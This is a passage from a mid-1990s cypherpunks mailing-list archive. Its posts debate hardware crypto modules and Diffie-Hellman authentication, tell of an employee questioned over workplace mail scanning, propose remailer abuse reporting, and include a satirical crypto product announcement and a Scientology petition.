are okay on a perspecive employee being interested in the tech grunge of
net access, and considering it part of the working environment, a benefit,
like gourmet coffee.

On the other hand, HP (that god-awful backwards cesspool of bureacracy) had
full net connections to the outside world (when I was there, since turned
off) but in a pathetic attempt to show due diligence searched our
briefcases and backpacks (but not the contents of the laptops, floppies, or
tape cartridges therein).  Someone's going to have to explain to their
legal counsel that taking paper versions out isn't the most efficient
way... :-)

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Bierbaum <aronb@nishna.net>
Date: Tue, 11 Feb 1997 06:25:56 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <199702111425.GAA19704@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Bierbaum <aronb@nishna.net>
Date: Sun, 9 Feb 1997 10:15:45 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: UNSUBCRIBE CENSORSHIP
Message-ID: <2F39B26F.6753@nishna.net>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBCRIBE CENSORSHIP




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peng-chiew Low <pclow@pc.jaring.my>
Date: Tue, 20 Feb 96 22:25:42 PST
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: ANNOUNCE: New Crypto Product!
In-Reply-To: <Pine.3.89.9602201458.A32281-0100000@dal1820.computek.net>
Message-ID: <2F49867D.50@pc.jaring.my>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp wrote:
> 
> CompuScam, Inc., an unwholly-owned invention of InventiData, is pleased to
> announce its latest offering in the growingly lucrative Internet Security
> market.  Called "Secure Users Everywhere", SUE is "guaranteed privacy
> protection for citizen-units everywhere," according to Ed Carp, Chief
> Scientist, Chief Executive Officer, and Chief Everything Else for
> CompuScam.  In today's press release, Carp said that "SUE is destined to
> become the dominant market leader in a field full of inferior products."
> 
> SUE is designed to work in any environment, and provides "Fort Knox"
> security for Internet users who wish to transact business over the "net".
> "Up until now, the Internet has been totally exposed, totally wide open to
> every 12-year-old wannabe cracker with a cheap PC and a modem," said Carp,
> "but with SUE, all that has changed overnight.  Now SUE users can safely
> and securely exchange the most sensitive of documents, including credit
> card and checking account numbers, SSN, employee information, credit
> reports, gold bars - virtually anything that is of value can now be safely
> transported across the Internet."
> 
> No details were immediately available on the technical foundations of SUE,
> but Carp indicated that this is to provide enhanced security for its
> customers, adding that "you wouldn't want everyone to see your data, would
> you?  Then why would you want everyone to know about how this software
> works?"  According to CompuScam, SUE is composed of a small software "TSR"
> that is loaded into memory when a computer is first powered up, and a
> proprietary hardware device, known as a CUD ("compulsive exteriorization
> device") that provides "total security" for the software.  Carp indicated
> that the software TSR is "completely ITAR/RNG/SHA/RC4/BBS/RSA/MD5
> compliant, and meets all government standards for the very highest levels
> of cryptographic software, including FIPS-180, SESAME, and STU-III."  The
> hardware device is reportedly PRNG/RNG compliant.
> 
> Additionally, the SUE product is reportedly backwards-compatible with most
> other manufacturer's "inferior" cryptographic products, including products
> from Digital Pathworks, AT&T, VeriSign, IBM, and others.  Asked whether or
> not SUE is compatible with electronic cash offerings from First Virtual
> and others, Carp said, "Our total solution is so comprehensive, we're
> fixed problems that even the National Security Agency hasn't thought of
> yet.  We've also totally addressed the major problems that First Virtual
> brought to light last month in their press release," adding that no other
> cryptographic software maker had even responded to First Virtual's
> announcement, "let alone done anything about it.  We are acting now to
> protect our customers and children on the Internet by providing total
> coverage of the market."
> 
> Carp denied rumors that the CompuScam was nothing but a mailbox located in
> a Mailboxes Etc., branch office in Garland.  "I believe you will find that
> a reporter obtained an early press release which contained an
> typographical error in our suite number," adding that the company is
> expecting to move soon to new offices near Sun Microsystems in Palo Alto,
> adding that "the proximity to so many Silicon Valley companies will no
> doubt enhance the value of our
> stock^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hquality of our software."
> 
> When asked about the timing of the release, noting that it was only a few
> days before the company was scheduled to go public, Carp said, "this is an
> absolutely wonderful opportunity for investors to get in on the ground
> floor of this new technology" adding something about a new Porsche which
> the reporters didn't quite catch.
> 
> SUE is available for PCs running all versions of Microsoft Windows,
> Windows 95, Windows NT and MS-DOS, as well as all UNIX and UNIX-like
> platforms, and MVS.  The CUD hardware device is available in .357, .45,
> .44 Magnum, and 9MM versions.  Pricing was not immediately available.
> --

	And of course, export license has been granted to Iraq, Iran
	and the rest of the "non-hostile challenged" (?) world.
	Wonderful!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 1 Feb 95 00:11:56 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <199502010607.WAA04942@largo.remailer.net>
Message-ID: <Pine.3.89.9501312316.A19818-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


From: Matt Blaze <mab@research.att.com>
On Tue, 31 Jan 1995, Eric Hughes wrote:
> Let's take as our model general purpose computers which can't store
> secrets connected directly to crypto modules which can.  Furthermore,
> let us assume that these general purpose computer are subject to
> intrusion.  In other words, it's today's servers with attached crypto.
> 
> Now, the crypto module can't authenticate the machine it's plugged
> into, because, by definition, that machine can't keep a secret.

The model does not work, because that is not what we
want to do.

True:  Matt's proposal cannot authenticate a machine.  But
one does not really want to authenticate a machine.  One
wants to authenticate data, that one might choose
to transmit from that machine.  For this purpose a 
tamper resistant crypto module that can be connected 
to a machine, but which is under user
control, not under the control of the machine, is the
only totally bullet proof solution.

Of course expensive tamper proof crypto modules already exist:  A 
Dos computer in a room with a key, running virtually no 
network software and possessing almost no utilities, though
doubtless what Matt had in mind was a PCI card that one
could keep in ones wallet.

> The prevalent use of modules further reduces the likelihood of initial
> attacks based on spoofing.  Since active IP attacks require the
> subversion of routers, and since router software is much more
> difficult to subvert than general purpose servers, adding crypto
> modules to routers would be a big win.

This does not make sense:  The advantage of a tamper resistant module
is that if somebody physically gets to the system, he still cannot
get the key.  But if he physically gets to the router, he can
make it do his will, even if he does not get the key.  So one
might as well have the key in software in the router.

If the router is hard to subvert, and the attacker cannot 
physically get to it, then there is little need for a separate
tamper resistant module.  Software will do fine.

If the router can be got at, you are stuffed regardless, tamper
resistant module or not.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 31 Jan 95 11:50:07 PST
To: cypherpunks@toad.com
Subject: Re: PFF's Magna Carta and the new netserfs
Message-ID: <gate.07wTZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp wrote:
> > Unrestrained economic powers (companies, corporations, whatever) have
> > the same property.  This seemed to me to be a fundamental point that
> > Rishab was making -- and one that is often ignored in discussions of
> > economic libertarianism.
> 
> Agreed, but I don't see that that was the point Rishab was making.  Oh, well..

It was, actually. "Corporations can be at least as bad as governments" - the
examples of extreme circumstances were extraneous.

BTW the original analysis of the PFF thing by Richard Moore was posted here
on the 25th by him, though he seems to think that I got it from elsewhere and
volunteered to post it...

-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Tue, 31 Jan 95 22:10:16 PST
To: cypherpunks@toad.com
Subject: How the cypherpunks nearly got me fired (long)
Message-ID: <v01510101ab54c32859a7@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


This is a true story.

Yesterday, I found out that the mail at the company I work for is being
read by SAs on a regular basis.  The company is so ignorant about the net,
so stingy, and so paranoid, that they're terrified by the possibilities of
our internet access (which is crippled: email only, with a misconfigured
sendmail, no less; no ftp or telnet; no Usenet).  People receiving email
from outside could be receiving JPEGs or sound files--all
non-business-related, and therefore wasteful of company resources and
valuable employee time.  This in a biggish and very profitable Wall Street
firm.  These people are serious dinosaurs.

So they installed a pathetic scanning program.  Since the evil filetypes
are "usually uuencoded," their scanner greps all incoming mail for
"^begin"--no kidding--and stops the message right there if it's found.  I
found this out yesterday when my boss got a call from an SA: turns out he'd
been mailed a PostScript file from a vendor (some documentation we were
waiting for), and a "begin" statement in the file triggered the alarm.
After my boss assured him that it was just a user's manual, the SA let it
through.

Today, I was sitting in my boss's office in a routine meeting when _his_
boss (let's call him Larry) came by.  He said that _his_ boss (this is now
my boss's boss's boss--let's call her Mary) wanted to talk to me.  I had no
clue what she wanted, and neither did my direct boss, which seemed
particularly strange.  One thought that crossed my mind was that they were
going to give me a promotion, which I deserve and which it had been
obliquely suggested I might be getting soon.  Ha.

I walked with Larry over to our other building, four blocks away.  We went
up to Mary's office, and there she was, sitting with another woman I'd
never met.  The latter was introduced to me as--oh, let's call her "Paula."
There was a printout on the table.  Glancing at it out of the corner of my
eye, I noticed that it was a piece of email and got a chill.  Had they
intercepted email from me to a friend telling him how much the company I
work for sucks (which, ironically, I'd done just yesterday when I found out
about the mail-scanning)?  Would these three execs actually call me on this
and ask me to explain it?  I was very nervous, even though they had a piece
of MY PRIVATE CORRESPONDENCE in their hands.

Paula started off by explaining to me that they'd just installed this nifty
scanning program to catch illicit or potentially dangerous software coming
in from the outside.  Here was a piece of email, sent to me, containing a
uuencoded binary file inside of it (actually, it was just C source code, as
the header plainly stated).  From the comments at the front of the message,
it was clear that this was a piece of software intended to circumvent
firewalls, breach network security, and intentionally mask the identity of
the culprit.  (I'm more or less quoting from memory here; I only got to
glance at the comments, so I don't know exactly what the code does; it was
posted by Matt Ghio a day or two ago).  Why was I having a program like
this mailed to me?

I explained that it was sent to a mailing list that I subscribe to.  The
mailing list is concerned with encryption and data security.  This is just
something that someone on the list happened to post.  I have no control
over what people post to the list.  I read and save what's of interest to
me on the list and trash the rest, like everyone else does.

Why did I have this message forwarded from my private account to my work
account? she wanted to know.  Because I have all my mail from that
particular ("techie") list forwarded to my work account, the same way that
I keep all my other technical documentation at work--my Perl manual, my
Unix manuals, etc.  She actually pointed out that she saw the word
"cyberpunk" on the message (that's right, she can't even read), and this
also caused her concern.  (I would have been interested in hearing her
explanation for that.)

She started huffing and puffing about how this all made her very very
worried.  If there's no way to control this kind of thing, she'll just have
to turn everyone's internet access off (or just mine).  I said, "Look, I'll
turn off the forwarding when I get home tonight and not have any of this
stuff forwarded to me here any more."  She said, "Yes, naturally."

The discussion ended with her asking ME what they can do to assuage their
fears and prevent evil programs like this from being sent to employees of
the company.  I said that there wasn't much they could do; this stuff is
freely available, and if it isn't emailed in, people can still bring it in
on floppy discs.  It also could be mailed un-uuencoded (why was it
uuencoded anyway?)--and then what would they do, scan everyone's mail for
'{'?  What I didn't feel like saying at that particular place and time was
that people could just as easily bring sledgehammers in, or trash databases
using their legitimate access.  Unfortunately, the company has just got to
trust its employees.  I didn't actually say any of that because I just
wanted to get out of there.  I was getting bad flashbacks of being sent to
the principal's office in third grade.

My internet access at work is probably history; maybe everyone else's, too.
(Our access is so crippled that there are probably only four people who
even get mail from the outside; and as I said, there's no news or
ftp/telnet access.  I use it for nothing more than reading cypherpunks,
actually.  The system is so badly maintained that I'd never trust it for
personal email.)  I now have to start receiving and reading cypherpunk mail
at home, which presents a problem because my personal time is very limited,
whereas at work mail trickles in during the course of the day and is easily
managed.  This may mean I have to unsubscribe soon, after two and a half
years (almost since day one of the list).  I love Big Brother.

P.S.: I've tried to avoid injecting my personal politics into this story.
Yes, I know that as the owner of the connection, they've got the right to
do whatever they want (and this seems to be borne out by the ECPA
documents, which at a friend's suggestion I read as soon as I got home--too
bad, because I'd have seriously considered legal action).  I just thought
you might enjoy this little story, and would want to keep it in mind if
you're ever considering employment at Bear-Stearns.

   --Dave.

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Wed, 1 Feb 95 01:27:27 PST
To: cypherpunks@toad.com
Subject: Surety (authentication)
Message-ID: <9502010126.2.19816@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all of you who replied to my request.  I have what I 
needed.  Keith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 31 Jan 95 23:04:04 PST
To: LRH-L <alt.religion.scientology@newnews.demon.co.uk>
Subject: Scientology Petition v2.1
Message-ID: <Pine.SUN.3.91.950201015036.10698A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Church of Scientology
     PETITION Version 2.1
 
     I have undertaken on my own determinism to rewrite the petition
according to criticisms that I have received.  This version below is
short and sweet.  Since I have no authority whatsoever from those who
wrote the original petition to do this, this is certainly not official.
However if enough like it, perhaps we can talk the original petition
writers into considering it.   I will be posting this to
 
     news.admin.misc,alt.current-events.net-abuse,alt.privacy.anon-servers
     alt.censorship, alt.cyberpunks, and comp.org.eff.talk
 
     If you think it is worthwhile, please post it to other groups
as well.

     Homer


     We the undersigned deplore

     1.) The Church of Scientology's recent apparent (unproven)
efforts to rmgroup alt.religion.scientology.

     2.) The Church of Scientology's recent apparent (unproven)
efforts to cancel non copyrighted postings.

     3.) The Church of Scientology's overt and apparently covert plans
to spam both alt.religion.scientology and the rest of usenet with
'success stories' and testimonials, in order to drown out the
'graffitti' and negative testimony and commentary.

     4.) The Church of Scientology's legal efforts to shut off anonymous
remailers to alt.religion.scientology and alt.clearing.technology, and
their legal threats against the remailer operators for postings,
copyrighted or not, coming through them. 

     5.) The Church of Scientology's legal efforts to clamp down on
ANY copyrighted postings or quotations at all, even when clearly Fair
Use.

     6.) Any open or covert declaration by Church of Scientology
Officials against anyone on the internet declaring them to be a
Suppressive Person, and any open or covert declaration of anyone on
the internet as Fair Game whether or not it is to be called that.

     We the undersigned eschew any efforts on the part of anyone to
render alt.religion.scientology a moderated group.

     We the undersigned implore the Church of Scientology

     1.) To work closely with the Electronic Freedom Frontier to solve
what it perceives to be its problems with the internet, and to
endeavor to join the internet community as a respected citizen in the
forums of two way communication with anyone at any time on any
subject.

     2.) To help formulate guidelines for, and accept fair use
excerption of the works of L.  Ron Hubbard for the purpose of non
commercial criticism and educational commentary.

     Homer Wilson Smith
     United Free Zone Alliance




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 1 Feb 95 00:45:08 PST
To: cypherpunks@toad.com
Subject: Minnesota Cypherpunks Get Together and Bull Session
Message-ID: <LKqBlKjqRWXF078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Well folks, I've been on the list over a year and haven't seen a get
together for those of us in MN. So being the masochist that I am, I'm going
to try to put one together. Granted it won't be nearly as elaborate as those
in the Bay area, but it'll be a start.

Tentatively:

Date: Saturday March 4, 1995

Place: Applebees - Calhoun Village Shopping Center, Minneapolis

Time: 5:00pm 'til they throw us out.


This may change, depending on how many (or how few) respond. Let me know if
you are interested or have suggestions. This also will be a good
opportunity for some key signing too.


Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                Architecture is the art of how to waste space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 31 Jan 95 23:45:14 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: ESM
Message-ID: <199502010744.CAA09337@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just want to know where I can get a copy of ESM to test on some Linux and 
Solaris boxes ...

Please reply directly, thanx

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy877B0c4/pqJauBAQH4HwP+MCfRBEebhvIGxmlCIAUwEjACbYOlkdmd
5NL7+8zZ7wsXOS5/HxUIxtzM55WysA21SMWh0F2e9sabMqwfqM0j0WxdDJWmA5gg
oaJlttwHmNpneDcbNBKjKGBivWM2Byibk/1R7usqKjPwYL1qCN1ORvr87G6fNqxX
txpt8mts+bo=
=cF94
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Tue, 31 Jan 95 23:49:33 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <199502010527.VAA04897@largo.remailer.net>
Message-ID: <Pine.SUN.3.91.950201020755.4492A-100000@reggae.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Eric Hughes wrote:

> Just because plain old Diffie Hellman is subject to active attack
> doesn't mean it's useless.  Some protection is better than no
> protection at all.  It's still worthwhile implementing some security
> to make an opponent's task harder than to implement no security.

I'm curious though if there is some way to reduce the risk or at least 
increase the detectability of active DH spoofing.   I am thinking of the 
use of a trusted adjudicator who could receive information from both the 
original participants and check to see if the two keys matched.

Does anyone see a good solution to this problem?

-Thomas






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Wed, 1 Feb 95 04:23:52 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: A proposal....
In-Reply-To: <199502011144.AA03317@xs1.xs4all.nl>
Message-ID: <Pine.SUN.3.91.950201064928.14234A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Feb 1995, Remailer Operator wrote:

> I'll not block addresses based on information supplied here. You forget
> that there is no -formal- system, just a loose collection of operators.
> There is no single policy, that operators use. 

     Certainly, each operator is responsible for his own site and must
act or not act as he sees fit, accepting the full consequences of those
decisions.  That is as it should be.

     No one is DEMANDING that anyone block an address, except the
complainer's of course. :)

     However there is no harm in global reporting of spams or abuse,
as each operator can choose to act or not act on the data as he will.

> >     Perhaps there could be a blocking mailing list, and all remailers
> > could advertise that list in their headers, and anyone who wants to
> > be blocked can send mail to that list and we would all get it.
> 
> Perhaps. But I think it is a matter between the operator of a specific
> site and the to be blocked address, not something for the world to know.

     Well in general I would guess that complainers WANT all reops to know
about the complaint, they only complain to the one they got the abuse
from, but they figure the abuser will just go to the next remailer and
start there.  They would prefer a way to contact all reops immediately to
stop this sort of thing from happening.

     Complainer's are often so mad at the abuse that they not only
write the remailer operator but also his sysadmin.  Rahul for example
has gotten at least two things 'on his desk' in the last two days,
because of stuff going through my remailer, and that's two two many
for me.  That doesn't include all the ones he's gotten that he didn't
forward to me because it was already handled.
 
     Further various and sundry turkeys are going to be complaining
both to ME and possibly to Rahul for the next month about the
Valentine's spam, as late readers come up to it in their news.  I am
STILL getting complaints and the guy was hung out to dry 10 hours ago.

     The complainer almost always wants ALL remail to that address
stopped, and he certainly doesn't want to have to send repeated
messages to various remailers as the abuser keeps jumping around.
That would infuriate me no end if I were a postmaster.

     I would suggest that those of us who are interested, provide such
a common list for complainers, it would make them feel one hell of a
lot better about remailers, and keep the borderline cases on the side
of free speech.  A lot of people would like to see remailers shut
down, but for many of them its mainly because remailers make them feel
hysterical when things go out of control.  

     THEY DON'T KNOW WHERE TO GO TO BRING THINGS BACK INTO CONTROL,
AND THEY ARE NOT SURE THEY WILL BE PAID ATTENTION TOO.  This leads to
cc's to sysadmins and things, which I for one find INTOLERABLE.
 
     If we can bring a sense of immediate (even if partial) response
and control to the remailer network, then this hysteria may subside a
bit.

     I would distinguish between two kinds of abuse.
 
     Individual abuse, and spams.
 
     On the individual abuse I would agree that personal data should
probably be kept confidential.  Certainly one does not give away
the complainee to the complainer so of course one does not post
the complainee's name here or elsewhere.  I have taken to posting
the letters that I write them however, to show newbies possible
ways of dealing with these things.
 
     However I see nothing wrong with posting the complainer's name.  Some
complainer's might object, but I think they understand the need to widely
distribute, at least to the reop's, their address so that we can all
effectively block them IF WE CHOOSE. 

     In any case, such individual abuse is usually from one person to
another, and its easy to block the TO: line without revealing the From:
line, so there is no need to post the complainee's name. 
 
     In the case of spams, its different.  Spammers usually spam from one
address (forged or not), but post to many sites. Blocking the To: line is
impossible, but the From: line is easy. 
 
     In this case I am for posting the From: line, not only here but as
far and wide as possible.  If I am wrong, I am sure you will let me know. 
 
     I propose a mailing list, public or not, which those of you who wish
to can subscribe, and which we advertise in the headers of all outgoing
mail, saying that complaints should be sent to the mailing list.  That way
we all get to see spammers and complainers at once, making for much more
effective action. 

     This reduces the wear and tear on the postmasters, who surely do not
deserve the brunt of the abuse.  Like the Credit Card reporting agencies,
one call is all it takes to report all your cards gone, one mail is all it
takes to inform all operators of a spam or abuse. 
 
     I am not suggesting that all reops join this list, or act on the
data posted to it if they do, or advertise the list in their headers.  I 
propose that THOSE OF US WHO WANT TO DO THIS, do it.
 
     Sort of a loose coalition or alliance amongst reops to show
solidarity and personal responsibility towards the net.

     I KNOW people would appreciate it.

     How say any of you?
 
     Homer
 
P.S.  groupname@bull.com went down after the Valentine spam.
 
     Not very nice.  I have already gotten warm mail commending US
on how fast we nuked the guy.
 
    I say have no mercy for spammers.

    Homer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hughes <hughes@CSUA.Berkeley.EDU>
Date: Wed, 1 Feb 95 08:36:15 PST
To: cypherpunks@toad.com
Subject: Mystery files in the incoming/ directory
Message-ID: <199502011636.IAA15941@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm doing some archive maintenance at long last.  Be warned, you can't
upload right now because of some mystery configuration error that I
can't fix myself.

What I'm asking about are some files that were not uploaded with
descriptions.  I'll delete them in a week or so if I haven't got mail
indicating what they are.  This list is at the bottom of this message.
(Yes, some of them are quite old.)

Note that the archive maintainers have their own address now (see
header).  Please use it for all archive maintenance mail.  And please
read README.UPLOAD if you're going to upload in the future.

Eric
-----------------------------------------------------------------------------
-rw-rw-r--  1 hughes   remailer   119940 May 16  1994 contrib.zip
-rw-rw-r--  1 hughes   remailer    16360 Jun 23  1994 cpremailer.tar.gz
-rw-rw-r--  1 hughes   remailer    68968 Dec 16 09:07 dc-irc.alpha.tar.gz
-rw-rw-r--  1 hughes   remailer    14946 Dec  1 15:29 mkpgp.txt.uu.gz
-rw-rw-r--  1 hughes   remailer    75424 May 16  1994 pgp10.zip
-rw-rw-r--  1 hughes   remailer   233854 Jul 16  1994 pgpw26.zip
-rw-rw-r--  1 hughes   remailer    58033 May  7  1994 pwf11.zip
-rw-rw-r--  1 hughes   remailer     2913 Dec  1 15:27 signtools.tgz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 1 Feb 95 08:54:28 PST
To: cypherpunks@toad.com
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <199502011528.KAA23229@crypto.com>
Message-ID: <199502011653.IAA05730@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   The advantage of a secure crypto module on an insecure server (or
   router or whatever) is in limiting the scope of successful attack. 

Just to expand on this, the scope is limited in _time_, not space.
That's, when you pull out the module (literally or figuratively), the
attack is known to be over -- and don't plug it back into a machine of
unknown state.

   The main important
   difference between this attack and just learning the server's secret
   is that it only remains useful as long as the attack is undiscovered.

Yes.  Typically, once the attack is discovered, the method used in the
attack is also discovered.  The particular hole is then patched.  The
system can now be put back online without fear of immediate
re-compromise.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 1 Feb 95 08:58:07 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950201020755.4492A-100000@reggae.src.umd.edu>
Message-ID: <199502011656.IAA05742@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Thomas Grant Edwards <tedwards@src.umd.edu>

   I am thinking of the 
   use of a trusted adjudicator who could receive information from both the 
   original participants and check to see if the two keys matched.

How do you authenticate the adjudicator?

You'll have to communicate with the adjudicator and verify one of
their signatures.  You can just as easily exchange signed DH
parameters directly with the other party and verify the signature of
your correspondent.

This is another one of those problems where potential solutions often
just lead to infinite regress.

Eric






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 1 Feb 95 06:18:28 PST
To: cypherpunks@toad.com
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <9502011418.AA26570@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain




root says:
> I heard a rumor hear in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?

Considering that VoicePGP hasn't even been released, this is
fascinating news. Perhaps the same team could work next on cracking
things that haven't even been invented yet.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 1 Feb 95 06:35:42 PST
To: cypherpunks@toad.com
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <v03001102ab54e8d6db82@[140.174.229.210]>
Message-ID: <9502011435.AA26645@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 22:10 1/31/95, David Mandl wrote:
> 
> [really horrid story about true life at a corporate dinosaur deleted]
> 
> >I just thought
> >you might enjoy this little story, and would want to keep it in mind if
> >you're ever considering employment at Bear-Stearns.
> 
> Part of my job-interviewing procedure has become grilling a would-be
> employer (or whoever is asking for a contractor) about their net
> connections.

I'm a consultant. However, I won't take on clients with sufficiently
distasteful business practices. This is something I consider to be
sufficiently distasteful.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 01:18:54 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <9502010918.AA00196@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> 	I forgot to mention that the CD-ROM in development will be
> export restricted. It isn't going to be sold outside the united states
> and canada.


:-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 1 Feb 95 07:27:03 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <Pine.3.89.9501312316.A19818-0100000@netcom4>
Message-ID: <199502011528.KAA23229@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>> The prevalent use of modules further reduces the likelihood of initial
>> attacks based on spoofing.  Since active IP attacks require the
>> subversion of routers, and since router software is much more
>> difficult to subvert than general purpose servers, adding crypto
>> modules to routers would be a big win.
>
>This does not make sense:  The advantage of a tamper resistant module
>is that if somebody physically gets to the system, he still cannot
>get the key.  But if he physically gets to the router, he can
>make it do his will, even if he does not get the key.  So one
>might as well have the key in software in the router.
>
>If the router is hard to subvert, and the attacker cannot 
>physically get to it, then there is little need for a separate
>tamper resistant module.  Software will do fine.
>
>If the router can be got at, you are stuffed regardless, tamper
>resistant module or not.

The advantage of a secure crypto module on an insecure server (or
router or whatever) is in limiting the scope of successful attack. 
As Eric pointed out, if you can subvert a general purpose machine that
does all its crypto through a secure module that you can't subvert,
you can still add a covert "service" to the machine that lets
a future spoofer use the module remotely.  The main important
difference between this attack and just learning the server's secret
is that it only remains useful as long as the attack is undiscovered.
In the case of software keys, it is sufficient for the attacker to subvert
the machine that knows the secret ONCE.  He or she can put things back
to normal on the original machine and still know the secret forever, with
little chance of future detection.  With a secure module, the attacker has
to either steal (physically) the hardware (which will be discovered when
the real server stops working) or set up the kind of future access that
Eric mentioned (which, once discovered, will likely be turned off or
investigated).

If you have secure crypto hardware, you only have to worry about and
detect whether the server is being compromised continuously.  Otherwise,
without special hardware, you have to worry about and detect whether the
server was ever compromised since it was last rekeyed.  Personally,
the former seems like a realistic thing to try to do while the latter
doesn't, at least in the environments in which I live.

If the server hardware or software is insecure, cryptographic techniques
can't provide any absolute guarantees, period.   In the real world, though,
you're not interested in absolute guarantees, you just want to
reduce risks.   How effective the mechanisms to do this are depends on
how accurately they reflect the real world threats.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
